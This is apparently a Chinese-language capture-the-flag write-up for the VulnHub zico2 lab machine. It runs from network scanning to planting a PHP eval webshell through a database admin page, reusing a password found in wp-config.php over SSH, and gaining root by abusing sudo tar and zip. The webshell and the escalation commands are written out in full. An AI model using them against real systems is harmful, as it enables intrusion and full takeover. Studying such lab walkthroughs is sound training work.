前言
這次練習的靶機是vulnhub平臺的zico2,下載地址為:https://www.vulnhub.com/entry/zico2-1,210/,
虛擬機配置
這次采用的網路連接模式依然是NAT模式,為了避免掃描到其他物理主機,在匯入虛擬機后,右擊zico2靶機,然后選中配置,依次點擊網路配置->NAT模式->高級->生成,然后確認即可,
收集資訊
通過arp協議掃描局域網,又快又準,但是只能掃描局域網內的ip,
arp-scan -l
發現靶機的IP地址為 `192.168.119.218,然后用nmap對靶機進行詳細地掃描,
nmap -A -sV -p- --min-parallelism 100 192.168.119.218
-A 代表綜合性掃描,能收集很多重要的資訊
-sV 代表掃描主要的服務資訊
-p- 引數p是指定埠,后面的
-代表所有埠,
靶機開放了80埠,111埠和53953埠,查一下發現111可能存在漏洞,但是這個漏洞只能使目標主機崩潰,所以沒有過多研究,然后繼續掃描目錄,
dirsearch -u 192.168.119.218
獲取SHELL
目錄掃描發現dbadmin目錄,看名字應該是與資料庫的管理有關,打開這個目錄觀察一下,
發現了一個登陸頁面,隨便輸入一個密碼,一不小心就進了管理頁面,
經過一番搗鼓,最終發現這個后臺可以寫入webshell,首先隨便創建一個資料庫,
然后在該庫里創建一個表,
隨便設定一個欄位名稱,型別為TEXT,
在該表中寫入一句話木馬,
<?php @eval($_POST["a"]);?>
此時還無法訪問到該一句話木馬,因為資料庫檔案的默認存放位置是 /usr/databases/,在該目錄中的檔案是無法直接訪問到的,所以我們需要通過改名來移動檔案到可以訪問的位置,
將原來的/usr/databases/a改為 a.php,此處不要使用絕對路徑,需要使用相對路徑,此處使用相對路徑,資料庫檔案就會移動到當前管理頁面的同級目錄中,也就是 /dbadmin/中,
訪問 http://192.168.119.218/dbadmin/,發現a.php已經存在這個目錄中了,
然后通過蟻劍就可以連接到該一句話木馬,
提權
獲取shell嘗試一下suid提權,沒有成功,然后去查找靶機中有沒有存在敏感資訊,最終在家目錄中wordpress中的組態檔wp-config.php中找到了zico賬號和密碼 sWfCsfJSPV9H3AmQzw8,
嘗試用ssh登陸,成功連接上了,
ssh zico@192.168.119.218
嘗試各種提權方法,最終發現可以通過sudo提權,可以通過具有root權限的tar和zip來提權,
sudo -l
通過tar提權:
echo "/bin/bash" > shell.sh
sudo tar cf archive.tar * --checkpoint=1 --checkpoint-action=exec=sh shell.sh
–checkpoint=n 每寫入n個記錄之后設定一個檢查點(默認值為10),
–checkpoint-action=cmd 在每個checkpoint(檢查點)上執行cmd,
更多詳情可參考:https://blog.csdn.net/qq_33958714/article/details/111084322
通過zip提權:
touch a
sudo zip a.zip a -T --unzip-command="sh -c /bin/bash"
-T --unzip-command=cmd 代表在壓縮檔案后對壓縮檔案進行檢測,檢測檔案時不是用系統標準的
unzip -tqq來檢測,而是使用通過–unzip-command指定的cmd命令來檢查檔案,可能我翻譯不是太準確,這里貼出一張官方檔案的圖片供大家參考,
讀取flag!
cat /etc/flag.txt
參考文獻
[1] https://www.icode9.com/content-4-1121428.html,tar命令提權
[2] https://blog.csdn.net/qq_33958714/article/details/111084322,使用tar --checkpoint提權操作 詳解–checkpoint-action的引數及作用
[3] https://blog.csdn.net/qq_36412526/article/details/113500176,linux unzip 命令詳解
[4] https://blog.csdn.net/weixin_46700042/article/details/109649363,使用Zip命令進行本地提權(類Unix系統)
轉載請註明出處,本文鏈接:https://www.uj5u.com/qita/390570.html
標籤:其他